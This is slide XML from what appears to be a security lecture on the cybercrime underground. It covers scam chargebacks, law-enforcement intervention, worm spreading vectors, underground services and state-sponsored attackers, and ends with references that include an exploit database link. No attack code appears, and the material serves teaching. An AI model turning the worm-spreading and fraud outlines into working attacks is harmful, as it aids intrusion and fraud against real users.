            <a:off x="7338083" y="1216017"/>
            <a:ext cx="4599022" cy="3797259"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>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4442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82721"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Refunds and Chargebacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="308810" y="1321813"/>
            <a:ext cx="3926306" cy="5344680"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>A company with too many chargebacks will be suspended by their payment processor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Known as a “trigger-level”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Thus, the scammer must allow some refunds to prevent chargebacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>However, offering refunds reduces profits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473" y="1212761"/>
            <a:ext cx="7479717" cy="5453732"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Left Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20482249">
            <a:off x="6161808" y="1503629"/>
            <a:ext cx="1239252" cy="6152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Refunds</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Right Arrow 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20874828">
            <a:off x="4482471" y="5209675"/>
            <a:ext cx="1564105" cy="637674"/>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Chargebacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangular Callout 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8366365" y="156410"/>
            <a:ext cx="3461000" cy="1510475"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -19442"/>
              <a:gd name="adj2" fmla="val 768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peaks tend to alternate, meaning the scammer tries to prevent too many chargebacks while offering minimum refunds</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="103393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493"/>
            <a:ext cx="10515600" cy="1028131"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Intervention</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1321813"/>
            <a:ext cx="10515600" cy="1072471"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What is the most effective infrastructure for law enforcement to go after in order to shut down affiliate scams?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94284"/>
            <a:ext cx="12192000" cy="4321157"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4006516" y="2394284"/>
            <a:ext cx="3910263" cy="3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889708" y="2394284"/>
            <a:ext cx="4329363" cy="4321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8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24BB13C2-2F26-4801-A94C-56D43CD9E8E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9023824" y="4217771"/>
            <a:ext cx="3024966" cy="1599601"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -66364"/>
              <a:gd name="adj2" fmla="val -374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Follow the money, shut down or blacklist merchant banks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="374849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B140B-150C-4B4F-A87A-82A3C8807348}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Worm Considerations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5392C5F4-7CE2-466E-B272-01615BFAACE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vector of infection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Infect victim, mail copies to everyone in address book</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Infect removable drives, e.g. USB keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Infect shared network drives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scan for vulnerable hosts on the internet and exploit them</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attempt to crack remote access passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Spreading behavior: slow or fast? Noisy or stealthy?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Some have no payload, just spread</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Others are backdoors, bots, spyware, etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F15AF69D-D35E-42A3-8EAB-36A3F06DD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6482" y="140494"/>
            <a:ext cx="2539682" cy="2539682"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="344736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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="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500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="7" end="7"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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7" end="7"/>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="2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8" end="8"/>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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8" y="965199"/>
            <a:ext cx="6766078" cy="4927601"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Final Words</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8438729" y="965198"/>
            <a:ext cx="2707937" cy="4927602"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" kern="1200">
              <a:solidFill>
                <a:srgbClr val="FFC000"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="Straight Connector 9">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0714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Scratching the Surface of the Underground</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Zero-days</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The competitive market for fresh exploits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Search Engine Optimization (SEO)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attempt to push garbage results to the top of Google search</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click fraud and ad injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Steal money from legitimate advertisers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Illicit cryptocurrency mining (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Botcoin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Steal CPU cycles from infected hosts to mint currency</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CATPCHA-solving services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Employ real people to solve CAPTCHAs for a small fee</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Crowdturfing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Employ real people to create fake accounts (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>Sybils</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>sock puppets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Perform phone and email verification so accounts look legitimate</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41896920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Believe the Hype</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="4868022"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Evidence shows that the cybercrime market is large and profitable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>However, it’s not as bad as some breathless commentators claim</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The cybercrime underground is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> a billion-dollar industry</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Botnets almost never control tens of millions of hosts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Regardless of size, cybercrime is a huge problem due to asymmetry</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: spam</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Criminals may spend </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>millions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> of dollars sending spam per year</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Industry spends </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>billions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> of dollars per year on spam defense mechanisms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An attacker can strike anywhere around the globe at any time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Barriers to entry are low, costs are easily offset by profits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Arrests are uncommon</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31375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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="1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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="2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8" end="8"/>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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9" end="9"/>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="38"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Criminals vs. State-Sponsored Attackers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="4963646"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Our has focused on the criminal underground</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Goal: make as much money as possible, as quickly and easily as possible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Thus, criminals tend to go after </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>targets of opportunity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Gullible Internet users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Websites setup by novices</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Small companies with limited IT resources</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>State-sponsored attacks are a completely different beast</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unlimited resources and time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Much higher level of technical skill</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Patience to slowly and carefully penetrate hardened targets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Phishing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> Spear phishing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Fake AV and Ransomware  Stealthy rootkits and BIOS-level attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="372987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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="1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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="2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9" end="9"/>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="28"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10" end="1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500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="11" end="11"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="3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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Internet Explorer XML Buffer Overflow Exploit - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.exploit-db.com/exploits/7583/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>To Catch a Ratter: Monitoring the Behavior of Amateur </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>DarkComet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> RAT Operators in the Wild - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://people.eecs.berkeley.edu/~pearce/papers/rats_oakland_2017.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Manufacturing Compromise: The Emergence of Exploit-as-a-Service - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://cseweb.ucsd.edu/~savage/papers/CCS12Exploit.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Your Botnet is My Botnet: Analysis of a Botnet Takeover - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://www.cs.ucsb.edu/~vigna/publications/2009_stone-gross_cova_cavallaro_gilbert_szydlowski_kemmerer_kruegel_vigna_Torpig.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Analysis of a Botnet Takeover - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://www.cs.ucsb.edu/~vigna/publications/2011_stone_cova_gilbert_kemmerer_kruegel_vigna_torpig.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
